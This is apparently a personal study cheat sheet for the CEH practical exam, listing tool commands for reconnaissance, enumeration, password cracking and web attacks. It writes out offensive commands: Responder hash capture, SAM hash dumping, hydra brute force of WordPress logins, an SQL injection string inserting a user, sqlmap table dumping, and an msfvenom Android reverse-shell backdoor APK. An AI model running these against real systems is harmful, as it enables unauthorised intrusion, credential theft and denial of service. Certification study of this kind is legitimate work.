Few tools

  • VeraCrypt
  • BCTextEncoder
  • Cryptoforge
  • HashMyFiles
  • HashCalc

Online Attack to Crack the System’s Password using Responder

  • Linux: – chmod +x ./Responder.py – sudo ./Responder.py -I eth0
  • Windows – run \CEH-Tools
  • Linux: – john /home/ubuntu/Responder/logs/SMB-NTLMv2-SSP-


https://www.comparitech.com/net-admin/wireshark-cheat-sheet/ https://www.hackers-arise.com/post/2018/09/27/network-forensics-part-2-detecting-and-analyzing-a-scada-dos-attack

To find DOS (SYN and ACK) : tcp.flags.syn == 1 , tcp.flags.syn == 1 and tcp.flags.ack == 0 To find passwords : http.request.method == POST


# List interfaces
tcpdump -D

tcpdump -r [file.pcapng]

# display all packets transferred to and from a specified IP address.
tcpdump -r [file.pcapng] host [IP]

# Output your results into a specified file type such as csv or txt
tcpdump -r [file.pcapng] -w [filename]

# prevent the tool from converting packets and DNS resolution
tcpdump -nn -r [file.pcap] -w [filename]

tcpdump -r [file.pcap] host [IP] and port [PORT] -nn -w file.txt

# Filter out unwanted packages with BPF syntax
tcpdump -r [file.pcapng] BPF_SYNTAX -w OUTPUT_FILE.txt (e.g: src host and tcp port 80s)

Disk Encryption using VeraCrypt

Click VeraCrypt Create Volume Create an encrypted file container Specify a path and file name Set password Select NAT Move the mouse randomly for some seconds, and click Format Exit Select a drive, select file, open, mount Input password Dismount Exit

02. FootPrinting and Reconnaissance

Google hacking: https://osintcurio.us/2019/12/20/google-dorks/

# Find a pdf on site x
--filetype:pdf --site:www.eccouncil.org --in-url:CEH-Brochure 

Search public FTP with Napalm FTP https://www.searchftps.net

03. Scanning Networks

Ping sweep

nmap -sn

# Use ARP scanning
nmap -sn -PR
nmap -sn -PR | grep for | cut -f 5 -d " "

OS discovery

sudo nmap -A -PR -iL network.txt

Services discovery

# TCP connect
nmap -T4 -sT -iL network.txt

# Service enum
nmap -sCV -iL network.txt

# Using hping3
hping3 --scan known -S

# Find FTP
nmap -Pn -p21 --open

# Find machine with RDP
Nmap -Pn -p3389 --open

# Find machine with MySQL
Nmap -Pn -p 3306 --open

04. Enumeration

List the shares with nmap

nmap -sV --script nbstat.nse -v

List share (human notation)

nbtscan -vh

Perform NetBios Enumeration

NetBIOS enumeration on the network ( –

nbtscan -h -v -s :

Netbios listing in Windows

nbtstat -a IP

Perform SNMP Enumeration

Enumerate target with snmp-check


Name detection with nmap (not always available)

# DNS resolution
nmap -R -A

Name detection with arp (not always available)


Name Detection with SoftPerfect Network Scanner

Display connection status, shared folder/drive and network information

net use

Using SnmpWalk

snmpwalk -v1 -c public [target IP]
snmpwalk -v2c -c public [Target IP Address]

Using nmap scripts

nmap -sU -p 161 --script=snmp-sysdescr IP
nmap -sU -p 161 --script=snmp-processes IP 
nmap -sU -p 161 --script=snmp-win32-software IP
nmap -sU -p 161 --script=snmp-interfaces IP

LDAP Enumeration

Find domain controller

nmap -p389 --open 

Using ADExplorer

LDAP Enum with ADExplorer

Using Nmap

LDAP enumeration with nmap

nmap -p389 --script ldap-brute
nmap -p389 --script ldap-brute --script-args ldap.base='"cn=users,dc=CEH,dc=com"'

Using Python

LDAP enumeration using Python

import ldap3
server=ldap3.Server('', get_info=ldap3.ALL,port=389)

Search in LDAP server using Python

connection.search(search_base='DC=CEH,DC=com',search_filter='(&(objectclass=*))',search_scope='SUBTREE', attributes='*')

Using ldapsearch

ldapsearch -h -x -s base namingcontexts
ldapsearch -h -x -b "DC=CEH,DC=com"
ldapsearch -x -h -b "DC=CEH,DC=com" "objectclass=*"
ldapsearch -x -H ldap:// -D 'hutch.offsec' -w '' -b "DC=hutch,DC=offsec"

Perform NFS Enumeration

Find machines with NFS

nmap -p2049

Using RPCScan

python3 rpc-scan.py --rpc

Using SuperEnum


showmount -e


Find DNS server for site x

dig ns site.com

Query more information from the DNS

Zone Transfer for site x

dig axfr @ns1.bluehost.com certifiedhacker.com +nostat +nocomments +nocmd

Find IP of the DNS servers

dnsrecon -d site.com

Nmap DNS enumeration

nmap -T4 -p 53 --script dns-brute certifiedhacker.com

SMTP enumeration

Using nmap

nmap -p 25 --script=smtp-enum-users
nmap -p 25 --script=smtp-open-relay IP
nmap -p 25 --script=smtp-commands

Perform SMB and RPC Enumeration

Using NetScanTools Pro

Using Global Network Inventory

05. Vulnerability accessibility

Vulnerability assessment plays a major role in providing security to any organization’s resources and infrastructure from various internal and external threats. To secure a network, an administrator needs to perform patch management, install proper antivirus software, check configurations, solve known issues in third-party applications, and troubleshoot hardware with default configurations. All these activities together constitute vulnerability assessment.

Using OpenVas

Credentials: admin / password

Using Nessus

Credentials: admin / password

Discover hosts with nessus

Using nikto


nikto -Tuning 0123456789abc -h site.com
nikto -Tuning x -h site.com -o myresult -F txt

06. System Hacking

Scenario : Since security and compliance are high priorities for most organizations, attacks on an organization’s computer systems take many different forms such as spoofing, smurfing, and other types of Denial-of-Service (DoS) attacks. These attacks are designed to harm or interrupt the use of operational systems. Earlier, you gathered all possible information about the target through techniques such as footprinting, scanning, enumeration, and vulnerability analysis.

Dump hashes

Dump Windows SAM file hashes

pwDump7.exe > hashes.txt


Crack SAM hashes (in Windows)


Rainbow table cracking


09. Social Engineering

Organizations fall victim to social engineering tactics despite having strong security policies and solutions in place. This is because social engineering exploits the most vulnerable link in information system security—employees.

sudo setoolkit

Verify if a site is a phishing site with PhishTank

We can also audit organisation security for Phishing Attacks using OhPhish

10. Denial of Service

Scenario : Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) attacks have become a major threat to computer networks. These attacks attempt to make a machine or network resource unavailable to its authorized users. Usually, DoS and DDoS attacks exploit vulnerabilities in the implementation of TCP/IP model protocol or bugs in a specific OS.

Use mestasploit to run SYN flooding attack

DoS attacks such as SYN flooding, ping of death (PoD), and UDP application layer flood attacks with hping3

Note: -d: specifies data size; -S: sets the SYN flag; -p: specifies the destination port; and –flood: sends a huge number of packets.

perform a DoS attack with Raven-Storm

Launch a DDoS attack from Windows to Linux with HOIC tool

Launch a DDoS attack from Windows to Linux with LOIC tool

Use the Anti DDoS Guardian tool on Windows to detect and protect against the DDoS attack

14. Hacking Web Applications

Check for load balancers with dig

dig yahoo.com

Check for load balancers with lbd

ldb yahoo.com

Discover vulnerabilities in the target web application using Vega

Identify Clickjacking Vulnerability using ClickjackPoc

Brute force wordpress with hydra

hydra -e nsr -l <username> -P <password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

Brute force Wordpress with Burp

Scan for Xss with PwnXSS

15. SQL Injection

SQL injection is the most common and devastating attack that attackers can use to take control of data-driven web applications and websites. It is a code injection technique that exploits a security vulnerability in a website or application’s software. SQL injection attacks use a series of malicious SQL (Structured Query Language) queries or statements to directly manipulate any type of SQL database. Applications often use SQL statements to authenticate users, validate roles and access levels, store, obtain information for the application and user, and link to other data sources. SQL injection attacks work when applications do not properly validate input before passing it to a SQL statement.

Using Microsoft SQL Server

Manage Database from Windows

Insert a user via the SQL interface

blah';insert into login values ('tom','tom123'); --


Using SQLMap

We can use the sqlmap tool to perform an SQL injection attack

sqlmap -r request.txt -D database -t table --dump --batch

Using DSSS

We can use the DSSS tool to detect SQL injection vulnerabilities in a web application (www.moviescope.com).

Using ZAP

17. Hacking Mobile Platforms

Create a binary payload to hack android device in Msfvenom

msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST= R > backdoor.apk

https://github.com/aerosol-can/PhoneSploit Connect to a mobile with ADB

# In Powershell
adb devices


adb shell

19. Cloud Computing

Search for S3 bucket for company X with lazys3

Search for S3 bucket for company X with S3Scanner

Explore S3 with AwsCli

20. Cryptography

“Cryptography” comes from the Greek words kryptos, meaning “concealed, hidden, veiled, secret, or mysterious,” and graphia, “writing”; thus, cryptography is “the art of secret writing.” Cryptography is the practice of concealing information by converting plain text (readable format) into cipher text (unreadable format) using a key or encryption scheme: it is the process of the conversion of data into a scrambled code that is sent across a private or public network. There are two types of cryptography, Symmetric Encryption and Asymmetric encryption.


In windows hashMyFiles makes hash comparison easier

Find MD5 hash of a file

# In Windows
Certutil -hashfile "myfile.txt" md5

# In Linux
echo -n "some text" | md5sum
md5sum myfile.txt

Compare sha

#In kali
sha256sum file.txt

#In windows 
Get-FileHash -Algorithm "SHA256" -Path "C:\file.txt"

# Then compare hashes 
$hash1 -eq $hash2

Extension “.cfe” and “.cfd” correspond to CryptoForge encrypted document

Find CRC32 hash value of a file with hashMyFiles / hashCalc

Find MD5 hash value of a file md5Calculator


Encrypt a file with CryptoForge

Use BCTextEncoder, for encoding and decoding text in file (.hex) Encrypt file with BCTextEncoder

Self-signed Certificate

Adding a self-signed certificate to a IIS website

Email Encryption Using Rmail

  • Visit https://rmail.com/contact/rmail-trial
  • Choose rmail online (for Gmail, etc…)
  • Create a account (link your real email address to rmail)
  • Then visit app.rmail.com to send encrypted email

Disk Encrytion

Using Veracrypt

Use this tool to hyde abd encrypt the disk partitions

Create a secret volume

Open a secret vault

Using BitLocker Drive Encrytion

Using RHOS

When done with the disk, always disconnect then reconnect if data access needed


Use Cryptool, for encrytption/decryption of hex data

Using CrypTool (you can decrypt encryption E.g: 3DES,AES…)
